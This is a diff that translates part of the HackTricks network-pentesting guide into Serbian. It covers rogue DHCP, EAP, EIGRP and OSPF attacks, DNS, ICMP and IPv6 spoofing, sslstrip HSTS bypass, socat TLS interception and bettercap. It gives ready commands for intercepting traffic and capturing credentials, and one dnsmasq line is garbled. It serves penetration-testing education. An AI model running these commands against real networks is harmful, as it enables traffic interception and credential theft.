+Rogue DHCP server može biti postavljen koristeći DHCP skriptu koja se nalazi na `/usr/share/responder/DHCP.py`. Ovo je korisno za mrežne napade, kao što su hvatanje HTTP saobraćaja i kredencijala, preusmeravanjem saobraćaja na zlonamerni server. Međutim, postavljanje rogue gateway-a je manje efikasno jer omogućava samo hvatanje izlaznog saobraćaja sa klijenta, propuštajući odgovore sa pravog gateway-a. Umesto toga, preporučuje se postavljanje rogue DNS ili WPAD servera za efikasniji napad.
 
-A rogue DHCP server can be set up using the DHCP script located at `/usr/share/responder/DHCP.py`. This is useful for network attacks, like capturing HTTP traffic and credentials, by redirecting traffic to a malicious server. However, setting a rogue gateway is less effective since it only allows capturing outbound traffic from the client, missing the responses from the real gateway. Instead, setting up a rogue DNS or WPAD server is recommended for a more effective attack.
+Ispod su opcije komandi za konfiguraciju rogue DHCP servera:
 
-Below are the command options for configuring the rogue DHCP server:
-
-- **Our IP Address (Gateway Advertisement)**: Use `-i 10.0.0.100` to advertise your machine's IP as the gateway.
-- **Local DNS Domain Name**: Optionally, use `-d example.org` to set a local DNS domain name.
-- **Original Router/Gateway IP**: Use `-r 10.0.0.1` to specify the IP address of the legitimate router or gateway.
-- **Primary DNS Server IP**: Use `-p 10.0.0.100` to set the IP address of the rogue DNS server you control.
-- **Secondary DNS Server IP**: Optionally, use `-s 10.0.0.1` to set a secondary DNS server IP.
-- **Netmask of Local Network**: Use `-n 255.255.255.0` to define the netmask for the local network.
-- **Interface for DHCP Traffic**: Use `-I eth1` to listen for DHCP traffic on a specific network interface.
-- **WPAD Configuration Address**: Use `-w “http://10.0.0.100/wpad.dat”` to set the address for WPAD configuration, assisting in web traffic interception.
-- **Spoof Default Gateway IP**: Include `-S` to spoof the default gateway IP address.
-- **Respond to All DHCP Requests**: Include `-R` to make the server respond to all DHCP requests, but be aware that this is noisy and can be detected.
-
-By correctly using these options, a rogue DHCP server can be established to intercept network traffic effectively.
+- **Naša IP adresa (Gateway Advertisement)**: Koristite `-i 10.0.0.100` da reklamirate IP vaše mašine kao gateway.
+- **Lokalno DNS ime domena**: Opcionalno, koristite `-d example.org` da postavite lokalno DNS ime domena.
+- **Originalni Router/Gateway IP**: Koristite `-r 10.0.0.1` da navedete IP adresu legitimnog rutera ili gateway-a.
+- **Primarna DNS Server IP**: Koristite `-p 10.0.0.100` da postavite IP adresu rogue DNS servera koji kontrolišete.
+- **Sekundarna DNS Server IP**: Opcionalno, koristite `-s 10.0.0.1` da postavite IP adresu sekundarnog DNS servera.
+- **Mrežna maska lokalne mreže**: Koristite `-n 255.255.255.0` da definišete mrežnu masku za lokalnu mrežu.
+- **Interfejs za DHCP saobraćaj**: Koristite `-I eth1` da slušate DHCP saobraćaj na određenom mrežnom interfejsu.
+- **WPAD konfiguraciona adresa**: Koristite `-w “http://10.0.0.100/wpad.dat”` da postavite adresu za WPAD konfiguraciju, pomažući u presretanju web saobraćaja.
+- **Lažiranje IP adrese podrazumevanog gateway-a**: Uključite `-S` da lažirate IP adresu podrazumevanog gateway-a.
+- **Odgovarajte na sve DHCP zahteve**: Uključite `-R` da server odgovara na sve DHCP zahteve, ali budite svesni da je ovo bučno i može biti otkriveno.
 
+Ispravnim korišćenjem ovih opcija, rogue DHCP server može biti uspostavljen za efikasno presretanje mrežnog saobraćaja.
 ```python
 # Example to start a rogue DHCP server with specified options
 !python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R
 ```
+### **EAP napadi**
 
-### **EAP Attacks**
+Evo nekih od taktika napada koje se mogu koristiti protiv 802.1X implementacija:
 
-Here are some of the attack tactics that can be used against 802.1X implementations:
-
-- Active brute-force password grinding via EAP
-- Attacking the RADIUS server with malformed EAP content _\*\*_(exploits)
-- EAP message capture and offline password cracking (EAP-MD5 and PEAP)
-- Forcing EAP-MD5 authentication to bypass TLS certificate validation
-- Injecting malicious network traffic upon authenticating using a hub or similar
-
-If the attacker if between the victim and the authentication server, he could try to degrade (if necessary) the authentication protocol to EAP-MD5 and capture the authentication attempt. Then, he could brute-force this using:
+- Aktivno brute-force otkrivanje lozinki putem EAP
+- Napad na RADIUS server sa neispravnim EAP sadržajem _\*\*_(eksploati)
+- Hvatanje EAP poruka i offline otkrivanje lozinki (EAP-MD5 i PEAP)
+- Prisiljavanje EAP-MD5 autentifikacije da zaobiđe TLS validaciju sertifikata
+- Umetanje zlonamernog mrežnog saobraćaja prilikom autentifikacije koristeći hub ili slično
 
+Ako je napadač između žrtve i servera za autentifikaciju, mogao bi pokušati da degradira (ako je potrebno) autentifikacijski protokol na EAP-MD5 i uhvati pokušaj autentifikacije. Zatim bi mogao da koristi brute-force za ovo:
 ```
 eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt
 ```
+### FHRP (GLBP & HSRP) napadi 
 
-### FHRP (GLBP & HSRP) Attacks 
+**FHRP** (First Hop Redundancy Protocol) je klasa mrežnih protokola dizajniranih da **kreiraju vrući redundantni sistem rutiranja**. Sa FHRP-om, fizički ruteri mogu biti kombinovani u jedan logički uređaj, što povećava otpornost na greške i pomaže u raspodeli opterećenja.
 
-**FHRP** (First Hop Redundancy Protocol) is a class of network protocols designed to **create a hot redundant routing system**. With FHRP, physical routers can be combined into a single logical device, which increases fault tolerance and helps distribute the load.
-
-**Cisco Systems engineers have developed two FHRP protocols, GLBP and HSRP.**
+**Inženjeri Cisco Systems-a su razvili dva FHRP protokola, GLBP i HSRP.**
 
 {{#ref}}
 glbp-and-hsrp-attacks.md
@@ -620,82 +549,73 @@ glbp-and-hsrp-attacks.md
 
 ### RIP
 
-Three versions of the Routing Information Protocol (RIP) are known to exist: RIP, RIPv2, and RIPng. Datagrams are sent to peers via port 520 using UDP by RIP and RIPv2, whereas datagrams are broadcasted to UDP port 521 via IPv6 multicast by RIPng. Support for MD5 authentication was introduced by RIPv2. On the other hand, native authentication is not incorporated by RIPng; instead, reliance is placed on optional IPsec AH and ESP headers within IPv6.
+Poznate su tri verzije Routing Information Protocol (RIP): RIP, RIPv2 i RIPng. Datagrami se šalju partnerima putem porta 520 koristeći UDP kod RIP i RIPv2, dok se datagrami emitiraju na UDP port 521 putem IPv6 multicast kod RIPng. Podrška za MD5 autentifikaciju uvedena je u RIPv2. S druge strane, nativna autentifikacija nije uključena u RIPng; umesto toga, oslanja se na opcione IPsec AH i ESP zaglavlja unutar IPv6.
 
-- **RIP and RIPv2:** Communication is done through UDP datagrams on port 520.
-- **RIPng:** Utilizes UDP port 521 for broadcasting datagrams via IPv6 multicast.
+- **RIP i RIPv2:** Komunikacija se vrši putem UDP datagrama na portu 520.
+- **RIPng:** Koristi UDP port 521 za emitovanje datagrama putem IPv6 multicast.
 
-Note that RIPv2 supports MD5 authentication while RIPng does not include native authentication, relying on IPsec AH and ESP headers in IPv6.
+Napomena: RIPv2 podržava MD5 autentifikaciju dok RIPng ne uključuje nativnu autentifikaciju, oslanjajući se na IPsec AH i ESP zaglavlja u IPv6.
 
-### EIGRP Attacks
+### EIGRP napadi
 
-**EIGRP (Enhanced Interior Gateway Routing Protocol)** is a dynamic routing protocol. **It is a distance-vector protocol.** If there is **no authentication** and configuration of passive interfaces, an **intruder** can interfere with EIGRP routing and cause **routing tables poisoning**. Moreover, EIGRP network (in other words, autonomous system) **is flat and has no segmentation into any zones**. If an **attacker injects a route**, it is likely that this route will **spread** throughout the autonomous EIGRP system.
+**EIGRP (Enhanced Interior Gateway Routing Protocol)** je dinamički protokol rutiranja. **To je protokol zasnovan na udaljenosti.** Ako nema **autentifikacije** i konfiguracije pasivnih interfejsa, **napadač** može ometati EIGRP rutiranje i izazvati **trovanje tabela rutiranja**. Štaviše, EIGRP mreža (drugim rečima, autonomni sistem) **je ravna i nema segmentaciju u bilo koje zone**. Ako **napadač injektuje rutu**, verovatno će se ova ruta **proširiti** kroz autonomni EIGRP sistem.
 
-To attack a EIGRP system requires **establishing a neighbourhood with a legitimate EIGRP route**r, which opens up a lot of possibilities, from basic reconnaissance to various injections.
+Napad na EIGRP sistem zahteva **uspostavljanje komšiluka sa legitimnim EIGRP ruterom**, što otvara mnoge mogućnosti, od osnovne rekognosciranja do raznih injekcija.
 
-[**FRRouting**](https://frrouting.org/) allows you to implement **a virtual router that supports BGP, OSPF, EIGRP, RIP and other protocols.** All you need to do is deploy it on your attacker’s system and you can actually pretend to be a legitimate router in the routing domain.
+[**FRRouting**](https://frrouting.org/) vam omogućava da implementirate **virtuelni ruter koji podržava BGP, OSPF, EIGRP, RIP i druge protokole.** Sve što treba da uradite je da ga postavite na sistem napadača i zapravo možete da se pretvarate da ste legitimni ruter u ruting domenu.
 
 {{#ref}}
 eigrp-attacks.md
 {{#endref}}
 
-[**Coly**](https://code.google.com/p/coly/) has capabilities for intercepting EIGRP (Enhanced Interior Gateway Routing Protocol) broadcasts. It also allows for the injection of packets, which can be utilized to alter routing configurations.
+[**Coly**](https://code.google.com/p/coly/) ima mogućnosti za presretanje EIGRP (Enhanced Interior Gateway Routing Protocol) emitovanja. Takođe omogućava injekciju paketa, što se može koristiti za promenu konfiguracija rutiranja.
 
 ### OSPF
 
-In Open Shortest Path First (OSPF) protocol **MD5 authentication is commonly employed to ensure secure communication between routers**. However, this security measure can be compromised using tools like Loki and John the Ripper. These tools are capable of capturing and cracking MD5 hashes, exposing the authentication key. Once this key is obtained, it can be used to introduce new routing information. To configure the route parameters and establish the compromised key, the _Injection_ and _Connection_ tabs are utilized, respectively.
+U Open Shortest Path First (OSPF) protokolu **MD5 autentifikacija se obično koristi za obezbeđivanje sigurne komunikacije između rutera**. Međutim, ova sigurnosna mera može biti kompromitovana korišćenjem alata kao što su Loki i John the Ripper. Ovi alati su sposobni da hvataju i razbijaju MD5 hešove, otkrivajući autentifikacioni ključ. Kada se ovaj ključ dobije, može se koristiti za uvođenje novih informacija o rutiranju. Za konfiguraciju parametara rute i uspostavljanje kompromitovanog ključa koriste se _Injection_ i _Connection_ kartice, redom.
 
-- **Capturing and Cracking MD5 Hashes:** Tools such as Loki and John the Ripper are used for this purpose.
-- **Configuring Route Parameters:** This is done through the _Injection_ tab.
-- **Setting the Compromised Key:** The key is configured under the _Connection_ tab.
+- **Hvatanje i razbijanje MD5 hešova:** Alati kao što su Loki i John the Ripper se koriste u tu svrhu.
+- **Konfiguracija parametara rute:** Ovo se vrši putem _Injection_ kartice.
+- **Postavljanje kompromitovanog ključa:** Ključ se konfiguriše pod _Connection_ karticom.
 
-### Other Generic Tools & Sources
+### Ostali generički alati i izvori
 
-- [**Above**](https://github.com/c4s73r/Above): Tool to scan network traffic and find vulnerabilities
-- You can find some **more information about network attacks** [**here**](https://github.com/Sab0tag3d/MITM-cheatsheet).
+- [**Above**](https://github.com/c4s73r/Above): Alat za skeniranje mrežnog saobraćaja i pronalaženje ranjivosti
+- Možete pronaći **više informacija o mrežnim napadima** [**ovde**](https://github.com/Sab0tag3d/MITM-cheatsheet).
 
 ## **Spoofing**
 
-The attacker configures all the network parameters (GW, IP, DNS) of the new member of the network sending fake DHCP responses.
-
+Napadač konfiguriše sve mrežne parametre (GW, IP, DNS) novog člana mreže šaljući lažne DHCP odgovore.
 ```bash
 Ettercap
 yersinia dhcp -attack 2 #More parameters are needed
 ```
-
 ### ARP Spoofing
 
-Check the [previous section](./#arp-spoofing).
+Proverite [prethodni odeljak](./#arp-spoofing).
 
 ### ICMPRedirect
 
-ICMP Redirect consist on sending an ICMP packet type 1 code 5 that indicates that the attacker is the best way to reach an IP. Then, when the victim wants to contact the IP, it will send the packet through the attacker.
-
+ICMP Redirect se sastoji od slanja ICMP paketa tipa 1 kod 5 koji ukazuje da je napadač najbolji način za dostizanje IP adrese. Tada, kada žrtva želi da kontaktira IP, poslaće paket kroz napadača.
 ```bash
 Ettercap
 icmp_redirect
 hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]
 ```
-
 ### DNS Spoofing
 
-The attacker will resolve some (or all) the domains that the victim ask for.
-
+Napadač će rešiti neke (ili sve) domene koje žrtva traži.
 ```bash
 set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on
 ```
-
-**Configure own DNS with dnsmasq**
-
+**Konfigurišite vlastiti DNS sa dnsmasq**
 ```bash
 apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1   domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon
 dig @localhost domain.example.com # Test the configured DNS
 ```
+### Lokalni prolazi
 
-### Local Gateways
-
-Multiple routes to systems and networks often exist. Upon building a list of MAC addresses within the local network, use _gateway-finder.py_ to identify hosts that support IPv4 forwarding.
-
+Više ruta ka sistemima i mrežama često postoji. Nakon izrade liste MAC adresa unutar lokalne mreže, koristite _gateway-finder.py_ da identifikujete hostove koji podržavaju IPv4 prosleđivanje.
 ```
 root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
 root@kali:~# cd gateway-finder/
@@ -713,66 +633,58 @@ gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
 [+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
 [+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
 ```
-
 ### [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
 
-For local host resolution when DNS lookups are unsuccessful, Microsoft systems rely on **Link-Local Multicast Name Resolution (LLMNR)** and the **NetBIOS Name Service (NBT-NS)**. Similarly, **Apple Bonjour** and **Linux zero-configuration** implementations utilize **Multicast DNS (mDNS)** for discovering systems within a network. Due to the unauthenticated nature of these protocols and their operation over UDP, broadcasting messages, they can be exploited by attackers aiming to redirect users to malicious services.
+Za lokalno rešavanje hostova kada DNS pretrage nisu uspešne, Microsoft sistemi se oslanjaju na **Link-Local Multicast Name Resolution (LLMNR)** i **NetBIOS Name Service (NBT-NS)**. Slično tome, **Apple Bonjour** i **Linux zero-configuration** implementacije koriste **Multicast DNS (mDNS)** za otkrivanje sistema unutar mreže. Zbog neautentifikovane prirode ovih protokola i njihove operacije preko UDP, emitovanjem poruka, mogu ih iskoristiti napadači koji imaju za cilj da preusmere korisnike na zlonamerne usluge.
 
-You can impersonate services that are searched by hosts using Responder to send fake responses.\
-Read here more information about [how to Impersonate services with Responder](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
+Možete se pretvarati da ste usluge koje traže hostovi koristeći Responder za slanje lažnih odgovora.\
+Pročitajte ovde više informacija o [kako se pretvarati da ste usluge sa Responderom](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
 
 ### [Spoofing WPAD](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
 
-Browsers commonly employ the **Web Proxy Auto-Discovery (WPAD) protocol to automatically acquire proxy settings**. This involves fetching configuration details from a server, specifically through a URL such as "http://wpad.example.org/wpad.dat". The discovery of this server by the clients can happen through various mechanisms:
+Pregledači obično koriste **Web Proxy Auto-Discovery (WPAD) protokol za automatsko preuzimanje proxy podešavanja**. To uključuje preuzimanje konfiguracionih detalja sa servera, posebno putem URL-a kao što je "http://wpad.example.org/wpad.dat". Otkriće ovog servera od strane klijenata može se dogoditi kroz različite mehanizme:
 
-- Through **DHCP**, where the discovery is facilitated by utilizing a special code 252 entry.
-- By **DNS**, which involves searching for a hostname labeled _wpad_ within the local domain.
-- Via **Microsoft LLMNR and NBT-NS**, which are fallback mechanisms used in cases where DNS lookups do not succeed.
+- Kroz **DHCP**, gde se otkrivanje olakšava korišćenjem posebnog koda 252.
+- Preko **DNS**, što uključuje pretragu za imenom hosta označenim kao _wpad_ unutar lokalne domene.
+- Putem **Microsoft LLMNR i NBT-NS**, koji su mehanizmi povratne veze korišćeni u slučajevima kada DNS pretrage ne uspevaju.
 
-The tool Responder takes advantage of this protocol by acting as a **malicious WPAD server**. It uses DHCP, DNS, LLMNR, and NBT-NS to mislead clients into connecting to it. To dive deeper into how services can be impersonated using Responder [check this](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
+Alat Responder koristi ovaj protokol delujući kao **zlonameran WPAD server**. Koristi DHCP, DNS, LLMNR i NBT-NS da zavara klijente da se povežu sa njim. Da biste dublje istražili kako se usluge mogu pretvarati koristeći Responder [proverite ovo](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
 
 ### [Spoofing SSDP and UPnP devices](spoofing-ssdp-and-upnp-devices.md)
 
-You can offer different services in the network to try to **trick a user** to enter some **plain-text credentials**. **More information about this attack in** [**Spoofing SSDP and UPnP Devices**](spoofing-ssdp-and-upnp-devices.md)**.**
+Možete ponuditi različite usluge u mreži kako biste pokušali da **prevarite korisnika** da unese neke **plain-text kredencijale**. **Više informacija o ovom napadu u** [**Spoofing SSDP and UPnP Devices**](spoofing-ssdp-and-upnp-devices.md)**.**
 
 ### IPv6 Neighbor Spoofing
 
-This attack is very similar to ARP Spoofing but in the IPv6 world. You can get the victim think that the IPv6 of the GW has the MAC of the attacker.
-
+Ovaj napad je vrlo sličan ARP Spoofingu, ali u svetu IPv6. Možete navesti žrtvu da pomisli da IPv6 GW ima MAC adresu napadača.
 ```bash
 sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
 sudo fake_advertise6 -r -w 2 eth0  #This option will send the Neighbor Advertisement packet every 2 seconds
 ```
-
 ### IPv6 Router Advertisement Spoofing/Flooding
 
-Some OS configure by default the gateway from the RA packets sent in the network. To declare the attacker as IPv6 router you can use:
-
+Neki operativni sistemi podrazumevano konfigurišu gateway iz RA paketa poslatih u mreži. Da biste proglasili napadača kao IPv6 ruter, možete koristiti:
 ```bash
 sysctl -w net.ipv6.conf.all.forwarding=1 4
 ip route add default via  dev wlan0
 fake_router6 wlan0 fe80::01/16
 ```
-
 ### IPv6 DHCP spoofing
 
-By default some OS try to configure the DNS reading a DHCPv6 packet in the network. Then, an attacker could send a DHCPv6 packet to configure himself as DNS. The DHCP also provides an IPv6 to the victim.
-
+Podrazumevano, neki operativni sistemi pokušavaju da konfigurišu DNS čitajući DHCPv6 paket u mreži. Tada bi napadač mogao poslati DHCPv6 paket da se konfiguriše kao DNS. DHCP takođe obezbeđuje IPv6 žrtvi.
 ```bash
 dhcp6.spoof on
 dhcp6.spoof.domains 
 
 mitm6
 ```
+### HTTP (lažna stranica i JS kod injekcija)
 
-### HTTP (fake page and JS code injection)
-
-## Internet Attacks
+## Internet napadi
 
 ### sslStrip
 
-Basically what this attack does is, in case the **user** try to **access** a **HTTP** page that is **redirecting** to the **HTTPS** version. **sslStrip** will **maintain** a **HTTP connection with** the **client and** a **HTTPS connection with** the **server** so it ill be able to **sniff** the connection in **plain text**.
-
+U suštini, ono što ovaj napad radi je da, u slučaju da **korisnik** pokuša da **pristupi** **HTTP** stranici koja se **preusmerava** na **HTTPS** verziju. **sslStrip** će **održavati** **HTTP vezu sa** **klijentom i** **HTTPS vezu sa** **serverom** tako da će moći da **snifa** vezu u **čistom tekstu**.
 ```bash
 apt-get install sslstrip
 sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
@@ -781,33 +693,29 @@ sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
 iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT
 ```
+Više informacija [ovde](https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf).
 
-More info [here](https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf).
+### sslStrip+ i dns2proxy za zaobilaženje HSTS
 
-### sslStrip+ and dns2proxy for bypassing HSTS
+**Razlika** između **sslStrip+ i dns2proxy** u odnosu na **sslStrip** je u tome što će **preusmeriti** na primer _**www.facebook.com**_ **na** _**wwww.facebook.com**_ (obratite pažnju na **dodatno** "**w**") i postaviće **adresu ovog domena kao IP napadača**. Na taj način, **klijent** će se **povezati** na _**wwww.facebook.com**_ **(napadač)**, ali u pozadini **sslstrip+** će **održavati** **pravu vezu** putem https sa **www.facebook.com**.
 
-The **difference** between **sslStrip+ and dns2proxy** against **sslStrip** is that they will **redirect** for example _**www.facebook.com**_ **to** _**wwww.facebook.com**_ (note the **extra** "**w**") and will set the **address of this domain as the attacker IP**. This way, the **client** will **connect** to _**wwww.facebook.com**_ **(the attacker)** but behind the scenes **sslstrip+** will **maintain** the **real connection** via https with **www.facebook.com**.
+**Cilj** ove tehnike je da se **izbegne HSTS** jer _**wwww**.facebook.com_ **neće** biti sačuvan u **kešu** pregledača, tako da će pregledač biti prevaren da izvrši **facebook autentifikaciju u HTTP**.\
+Napomena: da bi se izvršio ovaj napad, žrtva mora prvo pokušati da pristupi [http://www.faceook.com](http://www.faceook.com) a ne https. To se može uraditi modifikovanjem linkova unutar http stranice.
 
-The **goal** of this technique is to **avoid HSTS** because _**wwww**.facebook.com_ **won't** be saved in the **cache** of the browser, so the browser will be tricked to perform **facebook authentication in HTTP**.\
-Note that in order to perform this attack the victim has to try to access initially to [http://www.faceook.com](http://www.faceook.com) and not https. This can be done modifying the links inside an http page.
+Više informacija [ovde](https://www.bettercap.org/legacy/#hsts-bypass), [ovde](https://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) i [ovde](https://security.stackexchange.com/questions/91092/how-does-bypassing-hsts-with-sslstrip-work-exactly).
 
-More info [here](https://www.bettercap.org/legacy/#hsts-bypass), [here](https://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) and [here](https://security.stackexchange.com/questions/91092/how-does-bypassing-hsts-with-sslstrip-work-exactly).
-
-**sslStrip or sslStrip+ doesn;t work anymore. This is because there are HSTS rules presaved in the browsers, so even if it's the first time that a user access an "important" domain he will access it via HTTPS. Also, notice that the presaved rules and other generated rules can use the flag** [**`includeSubdomains`**](https://hstspreload.appspot.com) **so the** _**wwww.facebook.com**_ **example from before won't work anymore as** _**facebook.com**_ **uses HSTS with `includeSubdomains`.**
+**sslStrip ili sslStrip+ više ne funkcionišu. To je zato što postoje HSTS pravila unapred sačuvana u pregledačima, tako da čak i ako je prvi put da korisnik pristupa "važnom" domenu, on će mu pristupiti putem HTTPS. Takođe, obratite pažnju da unapred sačuvana pravila i druga generisana pravila mogu koristiti oznaku** [**`includeSubdomains`**](https://hstspreload.appspot.com) **tako da** _**wwww.facebook.com**_ **primer iz prethodnog neće više raditi jer** _**facebook.com**_ **koristi HSTS sa `includeSubdomains`.**
 
 TODO: easy-creds, evilgrade, metasploit, factory
 
-## TCP listen in port
-
+## TCP slušanje na portu
 ```bash
 sudo nc -l -p 80
 socat TCP4-LISTEN:80,fork,reuseaddr -
 ```
+## TCP + SSL slušanje na portu
 
-## TCP + SSL listen in port
-
-#### Generate keys and self-signed certificate
-
+#### Generišite ključeve i samopotpisani sertifikat
 ```
 FILENAME=server
 # Generate a public/private key pair:
@@ -817,26 +725,20 @@ openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
 # Generate the PEM file by just appending the key and certificate files:
 cat $FILENAME.key $FILENAME.crt >$FILENAME.pem
 ```
-
-#### Listen using certificate
-
+#### Slušanje pomoću sertifikata
 ```
 sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -
 ```
-
-#### Listen using certificate and redirect to the hosts
-
+#### Slušanje koristeći sertifikat i preusmeravanje na hostove
 ```
 sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0
 ```
+Ponekad, ako klijent proveri da li je CA validan, možete **poslužiti sertifikat drugog imena hosta potpisan od strane CA**.\
+Još jedan zanimljiv test je da poslužite **sertifikat traženog imena hosta, ali samopotpisan**.
 
-Some times, if the client checks that the CA is a valid one, you could **serve a certificate of other hostname signed by a CA**.\
-Another interesting test, is to serve a c**ertificate of the requested hostname but self-signed**.
-
-Other things to test is to try to sign the certificate with a valid certificate that it is not a valid CA. Or to use the valid public key, force to use an algorithm as diffie hellman (one that do not need to decrypt anything with the real private key) and when the client request a probe of the real private key (like a hash) send a fake probe and expect that the client does not check this.
+Druge stvari koje treba testirati su pokušaj potpisivanja sertifikata sa validnim sertifikatom koji nije validan CA. Ili koristiti validni javni ključ, primorati korišćenje algoritma kao što je diffie hellman (onog koji ne zahteva dešifrovanje bilo čega sa pravim privatnim ključem) i kada klijent zatraži probe pravog privatnog ključa (kao što je hash) poslati lažnu probu i očekivati da klijent to ne proveri.
 
 ## Bettercap
-
 ```bash
 # Events
 events.stream off #Stop showing events
@@ -862,20 +764,19 @@ set wifi.ap.channel 5
 set wifi.ap.encryption false #If true, WPA2
 wifi.recon on; wifi.ap
 ```
+### Beleške o aktivnom otkrivanju
 
-### Active Discovery Notes
+Imajte na umu da kada se UDP paket pošalje uređaju koji nema traženi port, šalje se ICMP (Port Unreachable).
 
-Take into account that when a UDP packet is sent to a device that do not have the requested port an ICMP (Port Unreachable) is sent.
+### **ARP otkrivanje**
 
-### **ARP discover**
-
-ARP packets are used to discover wich IPs are being used inside the network. The PC has to send a request for each possible IP address and only the ones that are being used will respond.
+ARP paketi se koriste za otkrivanje koji IP-ovi se koriste unutar mreže. PC mora poslati zahtev za svaku moguću IP adresu, a samo oni koji se koriste će odgovoriti.
 
 ### **mDNS (multicast DNS)**
 
-Bettercap send a MDNS request (each X ms) asking for **\_services\_.dns-sd.\_udp.local** the machine that see this paket usually answer this request. Then, it only searchs for machine answering to "services".
+Bettercap šalje MDNS zahtev (svakih X ms) tražeći **\_services\_.dns-sd.\_udp.local**; mašina koja vidi ovaj paket obično odgovara na ovaj zahtev. Zatim, samo traži mašine koje odgovaraju na "services".
 
-**Tools**
+**Alati**
 
 - Avahi-browser (--all)
 - Bettercap (net.probe.mdns)
@@ -883,26 +784,23 @@ Bettercap send a MDNS request (each X ms) asking for **\_services\_.dns-sd.\_udp
 
 ### **NBNS (NetBios Name Server)**
 
-Bettercap broadcast packets to the port 137/UDP asking for the name "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+Bettercap emituje pakete na port 137/UDP tražeći ime "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".
 
 ### **SSDP (Simple Service Discovery Protocol)**
 
-Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 1900).
+Bettercap emituje SSDP pakete tražeći sve vrste usluga (UDP Port 1900).
 
 ### **WSD (Web Service Discovery)**
 
-Bettercap broadcast WSD packets searching for services (UDP Port 3702).
+Bettercap emituje WSD pakete tražeći usluge (UDP Port 3702).
 
-## References
+## Reference
 
 - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
-- **Network Security Assessment: Know Your Network (3rd edition)**
-- **Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things. By Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Wood**
+- **Procena bezbednosti mreže: Poznaj svoju mrežu (3. izdanje)**
+- **Praktično hakovanje IoT-a: Definitivni vodič za napad na Internet stvari. Autor: Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Wood**
 - [https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
 
-\
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
 
-{% embed url="https://go.intigriti.com/hacktricks" %}
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md b/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md
index 9dcab7fc1..961e12978 100644
--- a/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md
+++ b/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md
@@ -1,10 +1,10 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-### DHCPv6 vs. DHCPv4 Message Types Comparison
+### Poređenje tipova poruka DHCPv6 i DHCPv4
 
-A comparative view of DHCPv6 and DHCPv4 message types is presented in the table below:
+Uporedni pregled tipova poruka DHCPv6 i DHCPv4 prikazan je u tabeli ispod:
 
-| DHCPv6 Message Type                | DHCPv4 Message Type |
+| Tip poruke DHCPv6                  | Tip poruke DHCPv4   |
 | :--------------------------------- | :------------------ |
 | Solicit (1)                        | DHCPDISCOVER        |
 | Advertise (2)                      | DHCPOFFER           |
@@ -17,23 +17,23 @@ A comparative view of DHCPv6 and DHCPv4 message types is presented in the table
 | Reconfigure (10)                   | DHCPFORCERENEW      |
 | Relay-Forw (12), Relay-Reply (13)  | none                |
 
-**Detailed Explanation of DHCPv6 Message Types:**
